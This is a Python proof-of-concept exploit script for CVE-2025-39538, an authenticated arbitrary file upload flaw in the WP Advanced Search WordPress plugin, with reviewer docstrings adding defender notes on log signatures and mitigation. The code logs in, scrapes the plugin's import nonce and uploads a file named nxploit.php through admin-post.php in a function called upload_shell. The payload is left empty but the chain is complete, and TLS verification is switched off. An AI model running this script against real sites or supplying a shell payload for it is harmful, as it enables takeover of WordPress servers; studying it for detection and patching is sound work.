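"""Proof-of-concept client for CVE-2025-39538 (WP Advanced Search file upload).

Request sequence implemented below:

1. POST the supplied credentials to ``wp-login.php``.
2. GET the plugin's import/export admin page and read the hidden
   ``wp_advanced_search_up_nonce`` field.
3. POST a multipart form to ``wp-admin/admin-post.php`` with
   ``action=db_import`` and a file part named
   ``wp_advanced_search_file_import`` whose filename is ``nxploit.php``.

The payload string in this listing is empty, so step 3 sends a zero-length
file.

Defender notes:

* The sequence needs a valid WordPress login; presumably the account must
  also be allowed to open the plugin's import/export page (the script stops
  when the nonce field is absent) -- confirm against the advisory.
* Access logs show a GET for
  ``admin.php?page=WP_Advanced_Search_Callback_ExportImport`` followed by a
  POST to ``admin-post.php``. The ``action=db_import`` field and the ``.php``
  filename travel in the request body, so spotting them requires body
  inspection (for example at a WAF), not the access log alone.
* Mitigation: move to a plugin release that fixes CVE-2025-39538 (version not
  stated in this listing) and deny PHP execution in upload and temporary
  directories.
"""

import argparse

import requests
from bs4 import BeautifulSoup

#By Khaled ALenazi ( Nxploited )

# Silences urllib3's certificate warnings for the whole process. Together with
# ``session.verify = False`` below, the credentials posted by login() travel
# over a connection whose certificate is never validated.
requests.packages.urllib3.disable_warnings()


def create_session():
    """Return a ``requests.Session`` with TLS verification off and a fixed User-Agent."""
    session = requests.Session()
    # NOTE(review): certificate validation is disabled for every request made
    # through this session.
    session.verify = False
    session.headers.update({
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    })
    return session


def login(session, url, username, password):
    """POST the credentials to ``{url}/wp-login.php``.

    Returns True when the session's cookie jar afterwards holds a cookie whose
    name contains ``wordpress_logged_in``, otherwise False. The HTTP response
    itself is not inspected.
    """
    login_url = f"{url}/wp-login.php"
    data = {
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log In'
    }
    print("[*] Attempting login...")
    session.post(login_url, data=data)
    if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
        print("[+] Logged in successfully.")
        return True
    else:
        print("[-] Login failed.")
        return False


def get_nonce(session, url):
    """Fetch the plugin's import/export admin page and return its nonce value.

    Returns the ``value`` attribute of the ``<input>`` named
    ``wp_advanced_search_up_nonce``, or None when the field name does not
    appear in the page or no matching input element is found.
    """
    print("[*] Fetching nonce from import/export page...")
    page_url = f"{url}/wp-admin/admin.php?page=WP_Advanced_Search_Callback_ExportImport"
    response = session.get(page_url)
    # Cheap substring test before parsing the HTML.
    if "wp_advanced_search_up_nonce" not in response.text:
        print("[-] Nonce field not found in the page.")
        return None
    soup = BeautifulSoup(response.text, 'html.parser')
    nonce_input = soup.find("input", {"name": "wp_advanced_search_up_nonce"})
    if nonce_input:
        nonce = nonce_input.get("value")
        print(f"[+] Nonce extracted: {nonce}")
        return nonce
    print("[-] Failed to extract nonce.")
    return None


def upload_shell(session, url, nonce):
    """POST the import form with a ``.php`` file part to ``admin-post.php``.

    Prints a success line on HTTP 200 and the status code otherwise; returns
    nothing.
    """
    print("[*] Attempting to upload shell...")
    upload_url = f"{url}/wp-admin/admin-post.php"
    # The payload body is empty in this listing; the part still carries a .php
    # filename and a PHP content type.
    shell_code = ""
    files = {
        'wp_advanced_search_file_import': ('nxploit.php', shell_code, 'application/x-php')
    }
    data = {
        'wp_advanced_search_import': 'Import',
        'wp_advanced_search_up_nonce': nonce,
        'action': 'db_import'
    }
    response = session.post(upload_url, files=files, data=data)
    # NOTE(review): only the status code is checked. A 200 here does not by
    # itself show that the file was written or where; the message below is a
    # hint to go and look, not a confirmation.
    if response.status_code == 200:
        print("[+] File uploaded (check wp-content/uploads or temp directory).")
    else:
        print(f"[-] Upload failed. HTTP Status: {response.status_code}")


def main():
    """Parse the command line, then run login, nonce fetch and upload in order.

    Stops silently after the first step that fails (failed login or missing
    nonce); each step prints its own status line.
    """
    parser = argparse.ArgumentParser(description="CVE-2025-39538 - WP Advanced Search Arbitrary File Upload Exploit # By Nxploited (Khaled Alenazi)")
    parser.add_argument("-u", "--url", required=True, help="Target WordPress URL (e.g., http://127.0.0.1/wordpress)")
    parser.add_argument("-un", "--username", required=True, help="WordPress Username")
    parser.add_argument("-p", "--password", required=True, help="WordPress Password")
    args = parser.parse_args()

    session = create_session()
    if not login(session, args.url, args.username, args.password):
        return
    nonce = get_nonce(session, args.url)
    if not nonce:
        return
    upload_shell(session, args.url, nonce)


if __name__ == "__main__":
    main()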